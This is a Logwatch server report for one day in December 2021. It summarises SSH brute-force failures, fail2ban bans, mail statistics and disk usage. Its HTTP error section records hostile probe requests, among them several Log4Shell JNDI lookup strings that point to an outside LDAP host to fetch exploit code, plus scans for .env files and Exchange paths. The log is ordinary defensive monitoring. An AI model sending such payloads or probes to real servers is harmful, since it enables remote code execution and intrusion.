################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sun Dec 19 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-18 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 31:31 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
195.189.96.245 -> 91.200.100.126:4444: 1 Time(s)
A total of 7 sites probed the server
103.153.76.212
139.59.30.25
216.238.73.231
34.77.162.18
5.188.210.227
61.219.11.151
66.240.205.34
Requests with error response codes
400 Bad Request
null: 42 Time(s)
/: 14 Time(s)
xmlns:xsd=\x22http://www.w3.org/2001/XMLSchema\x22: 3 Time(s)
mstshash=Domain: 2 Time(s)
/c/version.js: 1 Time(s)
/flu/403.html: 1 Time(s)
/stalker_portal/c/version.js: 1 Time(s)
/stream/live.php: 1 Time(s)
/streaming/clients_live.php: 1 Time(s)
/system_api.php: 1 Time(s)
91.200.100.126:4444: 1 Time(s)
499 (undefined)
/: 5 Time(s)
/${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?id=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?page=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?s=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/?v=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s)
/login: 1 Time(s)
500 Internal Server Error
/: 32 Time(s)
/.env: 5 Time(s)
/robots.txt: 5 Time(s)
/nice%20ports%2C/Tri%6Eity.txt%2ebak: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/?q=%hydroparastatae%&va=b&t=hc&ia=web: 1 Time(s)
/Telerik.Web.UI.WebResource.axd?type=rau: 1 Time(s)
/actuator/health: 1 Time(s)
/admin/public/index.html: 1 Time(s)
/c/version.js: 1 Time(s)
/cgi-bin/config.exp: 1 Time(s)
/flu/403.html: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/remote/login: 1 Time(s)
/stalker_portal/c/version.js: 1 Time(s)
/stream/live.php: 1 Time(s)
/streaming/clients_live.php: 1 Time(s)
/system_api.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (49.234.30.113): 37 Time(s)
root (111.229.4.66): 33 Time(s)
root (121.4.118.208): 32 Time(s)
root (203.160.55.212): 25 Time(s)
root (36.91.119.221): 24 Time(s)
root (120.133.56.246): 21 Time(s)
root (165.22.220.159): 20 Time(s)
unknown (121.4.118.208): 18 Time(s)
root (139.198.4.166): 14 Time(s)
root (1.116.155.182): 13 Time(s)
unknown (49.234.30.113): 13 Time(s)
unknown (111.229.4.66): 12 Time(s)
unknown (189.180.31.18): 12 Time(s)
root (201-0-89-142.dsl.telesp.net.br): 10 Time(s)
unknown (120.133.56.246): 9 Time(s)
unknown (165.22.220.159): 8 Time(s)
unknown (201-0-89-142.dsl.telesp.net.br): 8 Time(s)
unknown (36.91.119.221): 8 Time(s)
unknown (139.198.4.166): 7 Time(s)
unknown (203.160.55.212): 6 Time(s)
root (189.180.31.18): 4 Time(s)
unknown (1.116.155.182): 4 Time(s)
root (112.19.174.226): 2 Time(s)
root (176.111.173.226): 2 Time(s)
unknown (109.166.153.103): 2 Time(s)
unknown (176.111.173.226): 2 Time(s)
unknown (189.195.123.28): 2 Time(s)
unknown (189.230.37.114): 2 Time(s)
unknown (77.118.110.71.wireless.dyn.drei.com): 2 Time(s)
unknown (h-155-4-0-67.a147.priv.bahnhof.se): 2 Time(s)
unknown (pasarelalora.electron.uv.es): 2 Time(s)
postgres (139.198.4.166): 1 Time(s)
root (164.90.203.55): 1 Time(s)
root (189.195.123.28): 1 Time(s)
unknown (134.236.247.145): 1 Time(s)
unknown (141.98.10.202): 1 Time(s)
unknown (146.185.79.101): 1 Time(s)
unknown (23.154.177.4): 1 Time(s)
Invalid Users:
Unknown Account: 123 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
10.358K Bytes accepted 10,607
10.358K Bytes sent via SMTP 10,607
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
14 Connections
5 Connections lost (inbound)
14 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.116.155.182: 13 times
36.91.119.221: 24 times
49.234.30.113: 37 times
111.229.4.66: 33 times
112.19.174.226: 2 times
120.133.56.246: 21 times
121.4.118.208: 32 times
139.198.4.166: 15 times
164.90.203.55: 1 time
165.22.220.159: 20 times
176.111.173.226: 2 times
189.180.31.18 (dsl-189-180-31-18-dyn.prod-infinitum.com.mx): 4 times
189.195.123.28 (customer-PUE-123-28.megared.net.mx): 1 time
201.0.89.142 (201-0-89-142.dsl.telesp.net.br): 10 times
203.160.55.212: 25 times
Illegal users from:
2001:470:1:332::9: 1 time
undef: 85 times
1.116.155.182: 4 times
2.57.121.35 (smtp35.kcmoa.com): 1 time
23.154.177.4: 1 time
36.91.119.221: 8 times
49.234.30.113: 13 times
64.62.197.122: 1 time
77.118.110.71 (77.118.110.71.wireless.dyn.drei.com): 2 times
109.166.153.103: 2 times
111.229.4.66: 12 times
120.133.56.246: 9 times
121.4.118.208: 18 times
134.236.247.145: 1 time
139.198.4.166: 7 times
141.98.10.202: 1 time
146.185.79.101: 1 time
147.156.82.79 (pasarelalora.electron.uv.es): 2 times
155.4.0.67 (h-155-4-0-67.A147.priv.bahnhof.se): 2 times
165.22.220.159: 8 times
176.111.173.226: 2 times
189.180.31.18 (dsl-189-180-31-18-dyn.prod-infinitum.com.mx): 12 times
189.195.123.28 (customer-PUE-123-28.megared.net.mx): 2 times
189.230.37.114 (dsl-189-230-37-114-dyn.prod-infinitum.com.mx): 2 times
201.0.89.142 (201-0-89-142.dsl.telesp.net.br): 8 times
203.160.55.212: 6 times
**Unmatched Entries**
Protocol major versions differ for 216.238.73.231: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 2 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################